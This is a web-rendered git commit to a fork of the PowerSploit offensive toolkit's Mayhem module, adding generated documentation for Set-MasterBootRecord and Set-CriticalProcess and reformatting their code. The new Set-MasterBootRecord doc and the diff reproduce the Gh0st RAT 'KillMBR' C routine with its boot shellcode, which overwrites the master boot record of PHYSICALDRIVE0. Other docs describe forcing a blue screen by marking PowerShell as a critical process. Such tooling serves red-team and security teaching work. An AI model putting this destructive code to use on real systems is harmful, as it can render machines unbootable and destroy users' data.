Gh0st
/
PowerSploit
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

For ./Mayhem/ : 

-PSScriptAnalyzering
    -Tweaking of synopsis blocks in order to support platyPS
    -Code standardization
    -Generated docs
This commit is contained in:
HarmJ0y 2016-12-14 18:05:22 -05:00
parent 1980f403ee
commit a81faf36a4
4 changed files with 390 additions and 92 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
Mayhem/Mayhem.psm1
View File

@ -38,10 +38,8 @@ function Set-MasterBootRecord
.NOTES .NOTES
Obviously, this will only work if you have a master boot record to Obviously, this will only work if you have a master boot record to
overwrite. This won't work if you have a GPT (GUID partition table) overwrite. This won't work if you have a GPT (GUID partition table).
#>
<#
This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us): This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):
// CGh0stApp message handlers // CGh0stApp message handlers
@ -83,8 +81,8 @@ int CGh0stApp::KillMBR()
NULL, NULL,
0, 0,
&dwBytesReturned, &dwBytesReturned,
NULL NUL
); )
// ?????? // ??????
WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL); WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
DeviceIoControl DeviceIoControl
@ -105,7 +103,9 @@ int CGh0stApp::KillMBR()
} }
#> #>
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param ( [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')]
Param (
[ValidateLength(1, 479)] [ValidateLength(1, 479)]
[String] [String]
$BootMessage = 'Stop-Crying; Get-NewHardDrive', $BootMessage = 'Stop-Crying; Get-NewHardDrive',
@ -220,7 +220,7 @@ int CGh0stApp::KillMBR()
$MBRBytes = [Runtime.InteropServices.Marshal]::AllocHGlobal($MBRSize) $MBRBytes = [Runtime.InteropServices.Marshal]::AllocHGlobal($MBRSize)
# Zero-initialize the allocated unmanaged memory # Zero-initialize the allocated unmanaged memory
0..511 | % { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) } 0..511 | ForEach-Object { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) }
[Runtime.InteropServices.Marshal]::Copy($MBRInfectionCode, 0, $MBRBytes, $MBRInfectionCode.Length) [Runtime.InteropServices.Marshal]::Copy($MBRInfectionCode, 0, $MBRBytes, $MBRInfectionCode.Length)
@ -300,7 +300,9 @@ Set-CriticalProcess -Force -Verbose
#> #>
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param ( [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')]
Param (
[Switch] [Switch]
$Force, $Force,

108
docs/Mayhem/Set-CriticalProcess.md Executable file
View File

@ -0,0 +1,108 @@
# Set-CriticalProcess
## SYNOPSIS
Causes your machine to blue screen upon exiting PowerShell.
PowerSploit Function: Set-CriticalProcess
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
## SYNTAX
```
Set-CriticalProcess [-Force] [-ExitImmediately] [-WhatIf] [-Confirm]
```
## DESCRIPTION
{{Fill in the Description}}
## EXAMPLES
### -------------------------- EXAMPLE 1 --------------------------
```
Set-CriticalProcess
```
### -------------------------- EXAMPLE 2 --------------------------
```
Set-CriticalProcess -ExitImmediately
```
### -------------------------- EXAMPLE 3 --------------------------
```
Set-CriticalProcess -Force -Verbose
```
## PARAMETERS
### -Force
Set the running PowerShell process as critical without asking for confirmation.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: False
Accept pipeline input: False
Accept wildcard characters: False
```
### -ExitImmediately
Immediately exit PowerShell after successfully marking the process as critical.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: False
Accept pipeline input: False
Accept wildcard characters: False
```
### -WhatIf
Shows what would happen if the cmdlet runs.
The cmdlet is not run.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases: wi
Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -Confirm
Prompts you for confirmation before running the cmdlet.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases: cf
Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
## INPUTS
## OUTPUTS
## NOTES
## RELATED LINKS

184
docs/Mayhem/Set-MasterBootRecord.md Executable file
View File

@ -0,0 +1,184 @@
# Set-MasterBootRecord
## SYNOPSIS
Proof of concept code that overwrites the master boot record with the
message of your choice.
PowerSploit Function: Set-MasterBootRecord
Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
## SYNTAX
```
Set-MasterBootRecord [[-BootMessage] <String>] [-RebootImmediately] [-Force] [-WhatIf] [-Confirm]
```
## DESCRIPTION
Set-MasterBootRecord is proof of concept code designed to show that it is
possible with PowerShell to overwrite the MBR.
This technique was taken
from a public malware sample.
This script is inteded solely as proof of
concept code.
## EXAMPLES
### -------------------------- EXAMPLE 1 --------------------------
```
Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'
```
## PARAMETERS
### -BootMessage
Specifies the message that will be displayed upon making your computer a brick.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: 1
Default value: Stop-Crying; Get-NewHardDrive
Accept pipeline input: False
Accept wildcard characters: False
```
### -RebootImmediately
Reboot the machine immediately upon overwriting the MBR.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: False
Accept pipeline input: False
Accept wildcard characters: False
```
### -Force
Suppress the warning prompt.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: False
Accept pipeline input: False
Accept wildcard characters: False
```
### -WhatIf
Shows what would happen if the cmdlet runs.
The cmdlet is not run.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases: wi
Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -Confirm
Prompts you for confirmation before running the cmdlet.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases: cf
Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
## INPUTS
## OUTPUTS
## NOTES
Obviously, this will only work if you have a master boot record to
overwrite.
This won't work if you have a GPT (GUID partition table).
This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):
// CGh0stApp message handlers
unsigned char scode\[\] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
int CGh0stApp::KillMBR()
{
HANDLE hDevice;
DWORD dwBytesWritten, dwBytesReturned;
BYTE pMBR\[512\] = {0};
// ????MBR
memcpy(pMBR, scode, sizeof(scode) - 1);
pMBR\[510\] = 0x55;
pMBR\[511\] = 0xAA;
hDevice = CreateFile
(
"\\\\\\\\.\\\\PHYSICALDRIVE0",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
return -1;
DeviceIoControl
(
hDevice,
FSCTL_LOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NUL
)
// ??????
WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
DeviceIoControl
(
hDevice,
FSCTL_UNLOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
CloseHandle(hDevice);
ExitProcess(-1);
return 0;
}
## RELATED LINKS

12
mkdocs.yml
View File

@ -124,7 +124,11 @@ pages:
- Find-AVSignature: 'AntivirusBypass/Find-AVSignature.md' - Find-AVSignature: 'AntivirusBypass/Find-AVSignature.md'
- CodeExecution: - CodeExecution:
- Functions: - Functions:
- Find-AVSignature: 'CodeExecution/Invoke-DllInjection.md' - Invoke-DllInjection: 'CodeExecution/Invoke-DllInjection.md'
- Find-AVSignature: 'CodeExecution/Invoke-ReflectivePEInjection.md' - Invoke-ReflectivePEInjection: 'CodeExecution/Invoke-ReflectivePEInjection.md'
- Find-AVSignature: 'CodeExecution/Invoke-Shellcode.md' - Invoke-Shellcode: 'CodeExecution/Invoke-Shellcode.md'
- Find-AVSignature: 'CodeExecution/Invoke-WmiCommand.md' - Invoke-WmiCommand: 'CodeExecution/Invoke-WmiCommand.md'
- Mayhem:
- Functions:
- Set-MasterBootRecord: 'Mayhem/Set-MasterBootRecord.md'
- Set-CriticalProcess: 'Mayhem/Set-CriticalProcess.md'